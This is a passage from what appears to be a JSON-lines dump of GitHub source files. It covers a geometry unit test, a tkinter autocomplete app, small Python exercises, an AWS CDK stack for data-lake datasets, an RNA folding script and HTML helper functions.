3.0, -1.0, -2.0, -3.0)\n self.assertEquals(bbox.minPoint(), V3D(-1.0,-2.0,-3.0))\n self.assertEquals(bbox.maxPoint(), V3D(1.0,2.0,3.0))\n self.assertEquals(bbox.centrePoint(), V3D(0.0,0.0,0.0))\n self.assertEquals(bbox.width(), V3D(2.0,4.0,6.0))\n\n def test_point_inside(self):\n box = BoundingBox(1.0, 2.0, 3.0, -1.0, -2.0, -3.0)\n self.assertTrue(box.isPointInside(V3D(0.0,0.0,0.0)))\n\n def test_doesLineIntersect(self):\n bbox = BoundingBox(4.1, 4.1, 4.1, -4.1, -4.1, -4.1)\n self.assertTrue(bbox.doesLineIntersect(V3D(-6.0,0.0,0.0), V3D(1.0,0.0,0.0)))\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"utkarshayachit/mantid","sub_path":"Code/Mantid/Framework/PythonInterface/test/python/mantid/geometry/BoundingBoxTest.py","file_name":"BoundingBoxTest.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"25218277414","text":"#coding=utf-8\r\nfrom tkinter import *\r\nimport tkinter as tk\r\nfrom example_words_prediction import Autocompleter\r\nfrom combined_competer import CombinedAutocompleter\r\nfrom PIL import Image, ImageTk\r\n\r\n\r\nclass Block:\r\n def __init__(self, master):\r\n self.master = master\r\n self.e = Entry(master, bg='white', fg='#696969', width=100, relief='groove', font='Times 30')\r\n self.b = Button(master, text=\"Complete\", bg='Gainsboro', fg='black', font='Times 15')\r\n self.b1 = Button(master, text='', bg='#A9A9A9', fg='white', font='Times 25')\r\n self.b2 = Button(master, text='', bg='#A9A9A9', fg='white', font='Times 25')\r\n self.b3 = Button(master, text='', bg='#A9A9A9', fg='white', font='Times 25')\r\n self.b_clean = Button(master, text='Clean', bg='Gainsboro', fg='black', font='Times 15')\r\n self.e.pack()\r\n self.b.pack()\r\n self.b1.pack()\r\n self.b2.pack()\r\n self.b3.pack()\r\n self.b_clean.pack()\r\n # self.completer = Autocompleter()\r\n self.completer = CombinedAutocompleter()\r\n self.text = ''\r\n\r\n photo = tk.PhotoImage(file='D:\\\\Typing\\\\data\\\\friends.gif')\r\n self.label = Label(image=photo, relief='flat')\r\n self.label.image = photo\r\n self.label.pack(side='bottom')\r\n\r\n def setFunc(self, func):\r\n self.b['command'] = eval('self.' + func)\r\n\r\n def setFuncBut1(self):\r\n self.b1['command'] = eval('self.set_text1')\r\n\r\n def setFuncBut2(self):\r\n self.b2['command'] = eval('self.set_text2')\r\n\r\n def setFuncBut3(self):\r\n self.b3['command'] = eval('self.set_text3')\r\n\r\n def setFuncButClean(self, func):\r\n self.b_clean['command'] = eval('self.'+func)\r\n\r\n def complete(self):\r\n text = self.e.get()\r\n completions = self.completer.complete(text)\r\n self.b1['text'] = completions[0]\r\n self.b2['text'] = completions[1]\r\n self.b3['text'] = completions[2]\r\n\r\n def set_text1(self):\r\n text = self.b1['text']\r\n ending = len(self.e.get().split(' ')[-1])\r\n self.e.insert(len(self.e.get()), text[ending:]+' ')\r\n self.complete()\r\n\r\n def set_text2(self):\r\n text = self.b2['text']\r\n ending = len(self.e.get().split(' ')[-1])\r\n self.e.insert(len(self.e.get()), text[ending:]+' ')\r\n self.complete()\r\n\r\n def set_text3(self):\r\n text = self.b3['text']\r\n ending = len(self.e.get().split(' ')[-1])\r\n self.e.insert(len(self.e.get()), text[ending:]+' ')\r\n self.complete()\r\n\r\n def clean(self):\r\n self.e.delete(0, len(self.e.get()))\r\n self.b1['text'] = ''\r\n self.b2['text'] = ''\r\n self.b3['text'] = ''\r\n\r\n\r\nroot = Tk()\r\nroot.geometry('800x600')\r\nroot.title('Autocomplete')\r\nroot[\"bg\"] = \"white\"\r\nfirst_block = Block(root)\r\nfirst_block.setFunc('complete')\r\nfirst_block.setFuncBut1()\r\nfirst_block.setFuncBut2()\r\nfirst_block.setFuncBut3()\r\nfirst_block.setFuncButClean('clean')\r\n\r\n# second_block = Block(root)\r\n# second_block.setFunc('strReverse')\r\n\r\nroot.mainloop()","repo_name":"BruchesLena/autocomplete","sub_path":"t1/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"32383781057","text":"#EJERCICIO3.- Para este código hemos utlilizado un bucle \"for\" que contará el número de letras \"a\" que hay en nuestro texto, para ello crearemos la variable \"contador_letra\" que irá sumando 1 por cada vez que introduzcamos la letra a en el texto.\n\ntexto = input(\"Introduce tu texto: \")\ncontador_letra = 0\nfor letra in texto:\n if letra == \"a\":\n contador_letra = contador_letra + 1\n elif texto == \".\":\n break\nprint(f\"En el texto aparecen {contador_letra} letras a.\")\n\nprint(\"\\n\")","repo_name":"jaimeeramiirez/M2_05_jaime_ramirez_rodriguez","sub_path":"ejercicio3.py","file_name":"ejercicio3.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36777457651","text":"class Solution:\n def canJump(self, nums: List[int]) -> bool:\n # Note: This is a dynamic programming[1] question. Usually, solving and fully understanding a dynamic programming problem is a 4 step process:\n # * Start with the recursive backtracking solution\n # * Optimize by using a memoization table (top-down[2] dynamic programming)\n # * Remove the need for recursion (bottom-up dynamic programming)\n # * Apply final tricks to reduce the time / memory complexity\n \n \"\"\"\n #NOT FINISHED CODE!\n #1 - iterate over nums, starting from 0th index\n #2 - look current possible jumps and take the maximum number, those are in the nums[currentIndex + 1 : currentIndex + currentNumber + 1]\n #3 - do the 2nd step until \"reach the end of the nums\", and return true\n #4 Otherwise, if \"before index == current index\", return false\n \n \n \n # bInd => before index\n # cInd => current index\n # n => length of nums\n def takeMaximumNum(nums, start, end):\n maxNum = -1\n maxInd = -1\n for i in range(start, end):\n if(start >= len(nums)):\n break\n if(maxNum < nums[i]):\n maxNum = nums[i]\n maxInd = i\n return [maxInd, maxNum]\n \n #print( takeMaximumNum(nums, 1, 3) )\n \n n = len(nums)\n currentInd = beforeInd = 0\n while(currentInd < n):\n currentNumber = nums[currentInd]\n \n if(currentInd + 1 < n):\n maxNumPair = takeMaximumNum(nums, currentInd + 1, currentInd + currentNumber + 1)\n \n beforeInd = currentInd\n currentInd = maxNumPair[0]\n currentNumber = maxNumPair[1]\n \n print(\"Before =>\", beforeInd)\n print(\"Current =>\", currentInd)\n if(beforeInd == currentInd):\n return False\n return True\n \"\"\"\n \n \n #Solution #1\n lastPosition = len(nums) - 1\n for i in range( len(nums) - 1, -1, -1 ):\n if( i + nums[i] >= lastPosition ):\n lastPosition = i\n return lastPosition == 0\n","repo_name":"burakaslantas/Leetcode","sub_path":"problems/jump_game/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":2292,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"20012417253","text":"import logging\nimport os\n\nfrom aws_cdk import (\n aws_s3 as s3,\n aws_kms as kms,\n aws_iam as iam,\n aws_ssm as ssm,\n aws_glue as glue,\n Stack,\n Duration,\n CfnResource,\n CustomResource,\n Tags,\n)\nfrom aws_cdk.aws_glue import CfnCrawler\n\nfrom dataall.base import db\nfrom dataall.base.aws.quicksight import QuicksightClient\nfrom dataall.base.aws.sts import SessionHelper\nfrom dataall.core.environment.services.environment_service import EnvironmentService\nfrom dataall.base.cdkproxy.stacks.manager import stack\nfrom dataall.core.environment.db.environment_models import Environment, EnvironmentGroup\nfrom dataall.core.stacks.services.runtime_stacks_tagging import TagsUtil\nfrom dataall.modules.datasets.aws.lf_dataset_client import LakeFormationDatasetClient\nfrom dataall.modules.datasets_base.db.dataset_models import Dataset\nfrom dataall.base.utils.cdk_nag_utils import CDKNagUtil\n\nlogger = logging.getLogger(__name__)\n\n\n@stack(stack='dataset')\nclass DatasetStack(Stack):\n \"\"\"Deploy common dataset resources:\n - dataset S3 Bucket + KMS key (If S3 Bucket not imported)\n - dataset IAM role\n - custom resource to create glue database and grant permissions\n - custom resource to register S3 location in LF\n - Glue crawler\n - Glue profiling job\n \"\"\"\n module_name = __file__\n\n def get_engine(self) -> db.Engine:\n envname = os.environ.get('envname', 'local')\n engine = db.get_engine(envname=envname)\n return engine\n\n def get_env(self, dataset) -> Environment:\n engine = self.get_engine()\n with engine.scoped_session() as session:\n env = session.query(Environment).get(dataset.environmentUri)\n return env\n\n def get_env_group(self, dataset) -> EnvironmentGroup:\n engine = self.get_engine()\n with engine.scoped_session() as session:\n env = EnvironmentService.get_environment_group(\n session, dataset.SamlAdminGroupName, dataset.environmentUri\n )\n return env\n\n def get_target_with_uri(self, target_uri) -> Dataset:\n engine = self.get_engine()\n with engine.scoped_session() as session:\n dataset = session.query(Dataset).get(target_uri)\n if not dataset:\n raise Exception('ObjectNotFound')\n return dataset\n\n def get_target(self) -> Dataset:\n engine = self.get_engine()\n with engine.scoped_session() as session:\n dataset = session.query(Dataset).get(self.target_uri)\n if not dataset:\n raise Exception('ObjectNotFound')\n return dataset\n\n def has_quicksight_enabled(self, env) -> bool:\n with self.get_engine().scoped_session() as session:\n return EnvironmentService.get_boolean_env_param(session, env, \"dashboardsEnabled\")\n\n def __init__(self, scope, id, target_uri: str = None, **kwargs):\n super().__init__(\n scope,\n id,\n description=\"Cloud formation stack of DATASET: {}; URI: {}; DESCRIPTION: {}\".format(\n self.get_target_with_uri(target_uri=target_uri).label,\n target_uri,\n self.get_target_with_uri(target_uri=target_uri).description,\n )[:1024],\n **kwargs)\n\n # Read input\n self.target_uri = target_uri\n self.pivot_role_name = SessionHelper.get_delegation_role_name()\n dataset = self.get_target()\n env = self.get_env(dataset)\n env_group = self.get_env_group(dataset)\n\n quicksight_default_group_arn = None\n if self.has_quicksight_enabled(env):\n quicksight_default_group_arn = f\"arn:aws:quicksight:{dataset.region}:{dataset.AwsAccountId}:group/default/{QuicksightClient.DEFAULT_GROUP_NAME}\"\n\n # Dataset S3 Bucket and KMS key\n dataset_key = False\n if dataset.imported and dataset.importedS3Bucket:\n dataset_bucket = s3.Bucket.from_bucket_name(\n self, f'ImportedBucket{dataset.datasetUri}', dataset.S3BucketName\n )\n if dataset.importedKmsKey:\n dataset_key = kms.Key.from_lookup(\n self, f'ImportedKey{dataset.datasetUri}', alias_name=f\"alias/{dataset.KmsAlias}\"\n )\n else:\n dataset_key = kms.Key(\n self,\n 'DatasetKmsKey',\n alias=dataset.KmsAlias,\n enable_key_rotation=True,\n policy=iam.PolicyDocument(\n statements=[\n iam.PolicyStatement(\n sid=\"EnableDatasetOwnerKeyUsage\",\n resources=['*'],\n effect=iam.Effect.ALLOW,\n principals=[\n iam.ArnPrincipal(env_group.environmentIAMRoleArn),\n ],\n actions=[\n \"kms:Encrypt\",\n \"kms:Decrypt\",\n \"kms:ReEncrypt*\",\n \"kms:GenerateDataKey*\",\n \"kms:DescribeKey\",\n \"kms:List*\",\n \"kms:GetKeyPolicy\",\n ],\n ),\n iam.PolicyStatement(\n sid='KMSPivotRolePermissions',\n effect=iam.Effect.ALLOW,\n actions=[\n 'kms:Decrypt',\n 'kms:Encrypt',\n 'kms:GenerateDataKey*',\n 'kms:PutKeyPolicy',\n \"kms:GetKeyPolicy\",\n 'kms:ReEncrypt*',\n 'kms:TagResource',\n 'kms:UntagResource',\n 'kms:DeleteAlias',\n 'kms:DescribeKey',\n 'kms:CreateAlias',\n 'kms:List*',\n ],\n resources=['*'],\n principals=[\n iam.ArnPrincipal(f'arn:aws:iam::{env.AwsAccountId}:role/{self.pivot_role_name}')\n ],\n )\n ]\n ),\n admins=[\n iam.ArnPrincipal(env.CDKRoleArn),\n ]\n )\n\n dataset_bucket = s3.Bucket(\n self,\n 'DatasetBucket',\n bucket_name=dataset.S3BucketName,\n encryption=s3.BucketEncryption.KMS,\n encryption_key=dataset_key,\n cors=[\n s3.CorsRule(\n allowed_methods=[\n s3.HttpMethods.HEAD,\n s3.HttpMethods.POST,\n s3.HttpMethods.PUT,\n s3.HttpMethods.DELETE,\n s3.HttpMethods.GET,\n ],\n allowed_origins=['*'],\n allowed_headers=['*'],\n exposed_headers=[],\n )\n ],\n block_public_access=s3.BlockPublicAccess.BLOCK_ALL,\n server_access_logs_bucket=s3.Bucket.from_bucket_name(\n self,\n 'EnvAccessLogsBucket',\n f'{env.EnvironmentDefaultBucketName}',\n ),\n server_access_logs_prefix=f'access_logs/{dataset.S3BucketName}/',\n enforce_ssl=True,\n versioned=True,\n bucket_key_enabled=True,\n )\n\n dataset_bucket.add_lifecycle_rule(\n abort_incomplete_multipart_upload_after=Duration.days(7),\n noncurrent_version_transitions=[\n s3.NoncurrentVersionTransition(\n storage_class=s3.StorageClass.INFREQUENT_ACCESS,\n transition_after=Duration.days(30),\n ),\n s3.NoncurrentVersionTransition(\n storage_class=s3.StorageClass.GLACIER,\n transition_after=Duration.days(60),\n ),\n ],\n transitions=[\n s3.Transition(\n storage_class=s3.StorageClass.INTELLIGENT_TIERING,\n transition_after=Duration.days(90),\n ),\n s3.Transition(\n storage_class=s3.StorageClass.GLACIER,\n transition_after=Duration.days(360),\n ),\n ],\n enabled=True,\n )\n\n # Dataset IAM role - ETL policies\n dataset_admin_policy = iam.Policy(\n self,\n 'DatasetAdminPolicy',\n policy_name=dataset.S3BucketName,\n statements=[\n iam.PolicyStatement(\n sid=\"ListAll\",\n actions=[\n \"s3:ListAllMyBuckets\",\n \"s3:ListAccessPoints\",\n ],\n resources=[\"*\"],\n effect=iam.Effect.ALLOW\n ),\n iam.PolicyStatement(\n sid=\"ListDatasetBucket\",\n actions=[\n \"s3:ListBucket\",\n \"s3:GetBucketLocation\",\n \"s3:GetBucketAcl\"\n ],\n resources=[dataset_bucket.bucket_arn],\n effect=iam.Effect.ALLOW,\n ),\n iam.PolicyStatement(\n sid=\"ReadWriteDatasetBucket\",\n actions=[\n \"s3:PutObject\",\n \"s3:PutObjectAcl\",\n \"s3:GetObject\",\n \"s3:GetObjectAcl\",\n \"s3:GetObjectVersion\",\n \"s3:DeleteObject\"\n ],\n effect=iam.Effect.ALLOW,\n resources=[dataset_bucket.bucket_arn + '/*'],\n ),\n iam.PolicyStatement(\n sid=\"ReadAccessPointsDatasetBucket\",\n actions=[\n 's3:GetAccessPoint',\n 's3:GetAccessPointPolicy',\n 's3:GetAccessPointPolicyStatus',\n ],\n effect=iam.Effect.ALLOW,\n resources=[\n f'arn:aws:s3:{dataset.region}:{dataset.AwsAccountId}:accesspoint/{dataset.datasetUri}*',\n ],\n ),\n iam.PolicyStatement(\n sid=\"GlueAccessCrawler\",\n actions=[\n \"glue:Get*\",\n \"glue:BatchGet*\",\n \"glue:CreateTable\",\n \"glue:UpdateTable\",\n \"glue:DeleteTableVersion\",\n \"glue:DeleteTable\",\n 'glue:BatchCreatePartition',\n 'glue:BatchDeleteConnection',\n 'glue:BatchDeletePartition',\n 'glue:BatchDeleteTable',\n 'glue:BatchDeleteTableVersion',\n ],\n effect=iam.Effect.ALLOW,\n resources=[\n f\"arn:aws:glue:*:{dataset.AwsAccountId}:catalog\",\n f\"arn:aws:glue:{dataset.region}:{dataset.AwsAccountId}:database/{dataset.GlueDatabaseName}\",\n f\"arn:aws:glue:{dataset.region}:{dataset.AwsAccountId}:table/{dataset.GlueDatabaseName}/*\"\n ]\n ),\n iam.PolicyStatement(\n sid=\"GlueAccessDefault\",\n actions=[\n \"glue:GetDatabase\",\n ],\n effect=iam.Effect.ALLOW,\n resources=[\n f\"arn:aws:glue:{dataset.region}:{dataset.AwsAccountId}:database/default\",\n ]\n ),\n iam.PolicyStatement(\n sid=\"CreateLoggingGlue\",\n actions=[\n 'logs:CreateLogGroup',\n 'logs:CreateLogStream',\n ],\n effect=iam.Effect.ALLOW,\n resources=[\n f'arn:aws:logs:{dataset.region}:{dataset.AwsAccountId}:log-group:/aws-glue/crawlers*',\n f'arn:aws:logs:{dataset.region}:{dataset.AwsAccountId}:log-group:/aws-glue/jobs/*',\n ],\n ),\n iam.PolicyStatement(\n sid=\"LoggingGlue\",\n actions=[\n 'logs:PutLogEvents',\n ],\n effect=iam.Effect.ALLOW,\n resources=[\n f'arn:aws:logs:{dataset.region}:{dataset.AwsAccountId}:log-group:/aws-glue/crawlers:log-stream:{dataset.GlueCrawlerName}',\n f'arn:aws:logs:{dataset.region}:{dataset.AwsAccountId}:log-group:/aws-glue/jobs/*',\n ],\n ),\n iam.PolicyStatement(\n actions=['s3:ListBucket'],\n resources=[f'arn:aws:s3:::{env.EnvironmentDefaultBucketName}'],\n effect=iam.Effect.ALLOW\n ),\n iam.PolicyStatement(\n sid=\"ReadEnvironmentBucketProfiling\",\n actions=[\n \"s3:GetObject\",\n \"s3:GetObjectAcl\",\n \"s3:GetObjectVersion\"\n ],\n effect=iam.Effect.ALLOW,\n resources=[f'arn:aws:s3:::{env.EnvironmentDefaultBucketName}/profiling/code/*'],\n ),\n iam.PolicyStatement(\n sid=\"ReadWriteEnvironmentBucketProfiling\",\n actions=[\n \"s3:PutObject\",\n \"s3:PutObjectAcl\",\n \"s3:GetObject\",\n \"s3:GetObjectAcl\",\n \"s3:GetObjectVersion\",\n \"s3:DeleteObject\"\n ],\n resources=[f'arn:aws:s3:::{env.EnvironmentDefaultBucketName}/profiling/results/{dataset.datasetUri}/*'],\n effect=iam.Effect.ALLOW,\n ),\n ],\n )\n if dataset_key:\n dataset_admin_policy.add_statements(\n iam.PolicyStatement(\n sid=\"KMSAccess\",\n actions=[\n \"kms:Decrypt\",\n \"kms:Encrypt\",\n \"kms:GenerateDataKey\"\n ],\n effect=iam.Effect.ALLOW,\n resources=[dataset_key.key_arn],\n )\n )\n dataset_admin_policy.node.add_dependency(dataset_bucket)\n\n dataset_admin_role = iam.Role(\n self,\n 'DatasetAdminRole',\n role_name=dataset.IAMDatasetAdminRoleArn.split('/')[-1],\n assumed_by=iam.CompositePrincipal(\n iam.ArnPrincipal(\n f'arn:aws:iam::{dataset.AwsAccountId}:role/{self.pivot_role_name}'\n ),\n iam.ServicePrincipal('glue.amazonaws.com'),\n ),\n )\n dataset_admin_policy.attach_to_role(dataset_admin_role)\n\n # Add Key Policy For Users\n if not dataset.imported:\n dataset_key.add_to_resource_policy(\n iam.PolicyStatement(\n sid=\"EnableDatasetIAMRoleKeyUsage\",\n resources=['*'],\n effect=iam.Effect.ALLOW,\n principals=[dataset_admin_role],\n actions=[\n \"kms:Encrypt\",\n \"kms:Decrypt\",\n \"kms:ReEncrypt*\",\n \"kms:GenerateDataKey*\",\n \"kms:DescribeKey\"\n ],\n )\n )\n\n # Datalake location custom resource: registers the S3 location in LakeFormation\n registered_location = LakeFormationDatasetClient(env, dataset).check_existing_lf_registered_location()\n\n if not registered_location:\n storage_location = CfnResource(\n self,\n 'DatasetStorageLocation',\n type='AWS::LakeFormation::Resource',\n properties={\n 'ResourceArn': f'arn:aws:s3:::{dataset.S3BucketName}',\n 'RoleArn': dataset_admin_role.role_arn,\n 'UseServiceLinkedRole': False,\n },\n )\n\n # Define dataset admin groups (those with data access grant)\n dataset_admins = [\n dataset_admin_role.role_arn,\n f'arn:aws:iam::{env.AwsAccountId}:role/{self.pivot_role_name}',\n env_group.environmentIAMRoleArn,\n ]\n if quicksight_default_group_arn:\n dataset_admins.append(quicksight_default_group_arn)\n\n # Get the Provider service token from SSM, the Lambda and Provider are created as part of the environment stack\n glue_db_provider_service_token = ssm.StringParameter.from_string_parameter_name(\n self,\n 'GlueDatabaseProviderServiceToken',\n string_parameter_name=f'/{env.resourcePrefix}/{dataset.environmentUri}/cfn/custom-resources/gluehandler/provider/servicetoken',\n )\n\n glue_db = CustomResource(\n self,\n f'{env.resourcePrefix}GlueDatabaseCustomResource',\n service_token=glue_db_provider_service_token.string_value,\n resource_type='Custom::GlueDatabase',\n properties={\n 'CatalogId': dataset.AwsAccountId,\n 'DatabaseInput': {\n 'Description': 'dataall database {} '.format(\n dataset.GlueDatabaseName\n ),\n 'LocationUri': f's3://{dataset.S3BucketName}/',\n 'Name': f'{dataset.GlueDatabaseName}',\n 'CreateTableDefaultPermissions': [],\n 'Imported': 'IMPORTED-' if dataset.imported else 'CREATED-'\n },\n 'DatabaseAdministrators': dataset_admins,\n },\n )\n\n # Support resources: GlueCrawler for the dataset, Profiling Job and Trigger\n crawler = glue.CfnCrawler(\n self,\n dataset.GlueCrawlerName,\n description=f'datall Glue Crawler for S3 Bucket {dataset.S3BucketName}',\n name=dataset.GlueCrawlerName,\n database_name=dataset.GlueDatabaseName,\n schedule={'scheduleExpression': f'{dataset.GlueCrawlerSchedule}'}\n if dataset.GlueCrawlerSchedule\n else None,\n role=dataset_admin_role.role_arn,\n targets=CfnCrawler.TargetsProperty(\n s3_targets=[\n CfnCrawler.S3TargetProperty(path=f's3://{dataset.S3BucketName}')\n ]\n ),\n )\n crawler.node.add_dependency(dataset_bucket)\n\n job_args = {\n '--additional-python-modules': 'urllib3<2,pydeequ',\n '--datasetUri': dataset.datasetUri,\n '--database': dataset.GlueDatabaseName,\n '--datasetRegion': dataset.region,\n '--dataallRegion': os.getenv('AWS_REGION', 'eu-west-1'),\n '--environmentUri': env.environmentUri,\n '--environmentBucket': env.EnvironmentDefaultBucketName,\n '--datasetBucket': dataset.S3BucketName,\n '--apiUrl': 'None',\n '--snsTopicArn': 'None',\n '--extra-jars': (\n f's3://{env.EnvironmentDefaultBucketName}'\n f'/profiling/code/jars/deequ-2.0.0-spark-3.1.jar'\n ),\n '--enable-metrics': 'true',\n '--enable-continuous-cloudwatch-log': 'true',\n '--enable-glue-datacatalog': 'true',\n '--SPARK_VERSION': '3.1',\n }\n\n job = glue.CfnJob(\n self,\n 'DatasetGlueProfilingJob',\n name=dataset.GlueProfilingJobName,\n description=f'datall Glue Profiling job for dataset {dataset.label}',\n role=dataset_admin_role.role_arn,\n allocated_capacity=10,\n execution_property=glue.CfnJob.ExecutionPropertyProperty(\n max_concurrent_runs=100\n ),\n command=glue.CfnJob.JobCommandProperty(\n name='glueetl',\n python_version='3',\n script_location=(\n f's3://{env.EnvironmentDefaultBucketName}'\n f'/profiling/code/glue_script.py'\n ),\n ),\n default_arguments=job_args,\n glue_version='3.0',\n tags={'Application': 'dataall'},\n )\n if dataset.GlueProfilingTriggerSchedule:\n trigger = glue.CfnTrigger(\n self,\n 'DatasetGlueProfilingTrigger',\n name=dataset.GlueProfilingTriggerName,\n description=f'datall Glue Profiling trigger schedule for dataset {dataset.label}',\n type='SCHEDULED',\n schedule=dataset.GlueProfilingTriggerSchedule,\n start_on_creation=True,\n actions=[\n glue.CfnTrigger.ActionProperty(\n job_name=dataset.GlueProfilingJobName, arguments=job_args\n )\n ],\n )\n trigger.node.add_dependency(job)\n\n Tags.of(self).add('Classification', dataset.confidentiality)\n\n TagsUtil.add_tags(stack=self, model=Dataset, target_type=\"dataset\")\n\n CDKNagUtil.check_rules(self)\n","repo_name":"awslabs/aws-dataall","sub_path":"backend/dataall/modules/datasets/cdk/dataset_stack.py","file_name":"dataset_stack.py","file_ext":"py","file_size_in_byte":22228,"program_lang":"python","lang":"en","doc_type":"code","stars":190,"dataset":"github-code","pt":"40"} +{"seq_id":"30264362493","text":"import numpy as np\n\n\ndef score(valueCG, valueAU, base1, base2):\n if (base1 == 'A' and base2 == 'U') or (base1 == 'U' and base2 == 'A'):\n return valueAU\n if (base1 == 'C' and base2 == 'G') or (base1 == 'G' and base2 == 'C'):\n return valueCG\n else:\n return 0\n\n\ndef nussinov(seq, valueCG, valueAU):\n N = len(seq)\n scoreMatrix = np.zeros((N, N), dtype=int)\n for k in range(N):\n for i, j in zip(range(0, N - k), range(k+1, N)):\n max_k = (\n lambda i, j: max(\n scoreMatrix[i, m] + scoreMatrix[m + 1, j] for m in range(i + 1, j)\n )\n if j-i > 1\n else 0\n )\n scoreMatrix[i][j] = max(\n scoreMatrix[i + 1, j],\n scoreMatrix[i, j - 1],\n scoreMatrix[i + 1, j - 1] + score(valueCG, valueAU, seq[i], seq[j]),\n max_k(i, j)\n )\n\n return scoreMatrix\ndef traceback(i, j, structure, DP, sequence, valueCG, valueAU):\n #in this case we've gone through the whole sequence. Nothing to do.\n if j <= i:\n return\n #if j is unpaired, there will be no change in score when we take it out, so we just recurse to the next index\n elif DP[i][j] == DP[i][j-1]:\n traceback(i, j-1, structure, DP, sequence, valueCG, valueAU)\n elif DP[i][j] == DP[i+1][j]:\n traceback(i+1, j, structure, DP, sequence, valueCG, valueAU)\n elif DP[i][j] == DP[i+1][j-1] + score(valueCG, valueAU, seq[i], seq[j]):\n structure.append((i, j))\n traceback(i + 1, j - 1, structure, DP, sequence, valueCG, valueAU)\n else:\n val, k = max([(DP[i][k] + DP[k + 1][j],k) for k in range(i + 1, j)])\n if DP[i, j] == val:\n traceback(i, k, structure, DP, sequence, valueCG, valueAU)\n traceback(k+1, j, structure, DP, sequence, valueCG, valueAU)\n\ndef write_structure(sequence, structure):\n dot_bracket = [\".\" for _ in range(len(sequence))]\n for s in structure:\n dot_bracket[min(s)] = \"(\"\n dot_bracket[max(s)] = \")\"\n return \"\".join(dot_bracket)\ndef parenthesingNussinov(seq, scoreMatrix, valueCG, valueAU,):\n struct = []\n traceback(0, len(seq)-1, struct, scoreMatrix, seq, valueCG, valueAU)\n return (write_structure(seq, struct), struct)\nseq = \"AGUCUGA\"\nprint(nussinov(seq, 2, 1))\nprint(parenthesingNussinov(seq,nussinov(seq, 2, 1),2,1))\n","repo_name":"KamiRab/Nussinov","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"39918522228","text":"\"\"\" Helper methods for Magnetizer\n\"\"\"\n\nfrom re import sub, search, compile as re_compile\n\nCOLOUR_OK = '\\033[92m'\nCOLOUR_WARNING = '\\033[93m'\nCOLOUR_ERROR = '\\033[91m'\nCOLOUR_END = '\\033[0m'\n\n\ndef link_h1(html, url):\n \"\"\"Add a link to the first <h1> in the provided html\n\n Parameters:\n html - the html pontentially containing the <h1>\n url - the URL to link to\n\n Returns:\n The same html but with a link in the first <h1>\n \"\"\"\n\n match = search(r\"<h1>(.*?)<\\/h1>\", html)\n\n if match:\n heading = match.group()\n heading_content = match.group(1)\n return html.replace(heading, \"<h1>\" + wrap_it_in_a_link(heading_content, url) + \"</h1>\", 1)\n\n return html\n\n\ndef wrap_it_in_a_link(html, url):\n \"\"\" Wrap a link around some arbitrary html\n\n Parameters:\n html - the html around which to wrap the link\n url - the URL to link to\n\n Returns:\n The same html but with a link around it\n \"\"\"\n\n return \"<a href='\" + url + \"'>\" + html + \"</a>\"\n\n\ndef downgrade_headings(html):\n \"\"\" 'Downgrade' headings one step, so that <h3> becomes <h4>, <h2> becomes <h3> etc\n\n Parameters:\n html - the html potentially containing <h1>, <h2> etc tags\n\n Returns:\n The same html but with h1, h2 and h3 downgraded one step\n \"\"\"\n\n html = html.replace('<h3', '<h4')\n html = html.replace('</h3', '</h4')\n\n html = html.replace('<h2', '<h3')\n html = html.replace('</h2', '</h3')\n\n html = html.replace('<h1', '<h2')\n html = html.replace('</h1', '</h2')\n\n return html\n\n\ndef abstract_from_html(html):\n \"\"\" Creates a Twitter card-friendly abstract from some html\n\n Parameters:\n html - the html to create an abstract from\n\n Returns:\n The first 300 characters from the html that are not html tags\n \"\"\"\n\n abstract = strip_tags_from_html(strip_anything_before_h1_from_html(html)).strip()\n abstract = sub(r'\\n', ' ', abstract)\n abstract = sub(r'\\s\\s+', ' ', abstract)\n\n if len(abstract) > 300:\n abstract = abstract[0:300] + '…'\n return abstract\n\n\ndef first_image_url_from_html(html):\n \"\"\" Find the first image url in some html\n\n Parameters:\n html - html potentially containing <img> tags\n\n Returns:\n The URL from the first image in the html (or None if none)\n \"\"\"\n\n pattern = \"<img .*?src=['\\\"](.*?)['\\\"].*?>\"\n match = search(pattern, html)\n\n if match:\n return match.group(1)\n\n return None\n\n\ndef strip_tags_from_html(html):\n \"\"\" Remove html tags from html\n\n Parameters:\n html - the html to remove tags from\n\n Returns:\n The html with all tags stripped\n\n todo: make better so that text between < and > isn't removed\n \"\"\"\n\n tag_re = re_compile(r'(<!--.*?-->|<[^>]*>)')\n return tag_re.sub('', html)\n\n\ndef strip_anything_before_h1_from_html(html):\n \"\"\" Strip everything before the first <h1> tag in the html\n\n Parameters:\n html - the html potentially containing a <h1>\n\n Returns:\n The same html, but without anything before the first <h1> tag (if there is one)\n \"\"\"\n\n stripped_html = html.strip()\n if '</h1>' in stripped_html:\n return stripped_html.split('</h1>', 1)[1]\n\n return html\n\n\ndef purge_non_article_filenames(filenames):\n \"\"\" Removes filenames not ending with .md from a list of filenames\n\n Parameters:\n filenames - list of filenames\n\n Returns:\n The list of filenames but with any filenames not ending with .md removed\n \"\"\"\n\n result = []\n\n for filename in filenames:\n if search(r'^\\d+-\\S+\\.md$', filename):\n result.append(filename)\n\n return result\n\n\ndef md_footnotes(source):\n \"\"\" Adds footnote anchor links to a block of markdown, linking from [^nn] to [^nn]:\n\n Parameters:\n source - a block of markdown\n\n Returns:\n Markdown with footnote anchor links added\n \"\"\"\n\n result = source\n\n # replace references [^nn] with \"<a href='#nn'>[nn]</a>\"\n reference_re = re_compile(r'\\[\\^(\\d+?)\\](?!:)')\n result = reference_re.sub(r\"<a href='#\\1'>[\\1]</a>\", result)\n\n # replace footnotes [^nn]: with \"<a id='nn'>[nn]:\"\n footnote_re = re_compile(r'\\[\\^(\\d+?)\\]:')\n result = footnote_re.sub(r\"<a id='\\1'></a>[\\1]:\", result)\n\n return 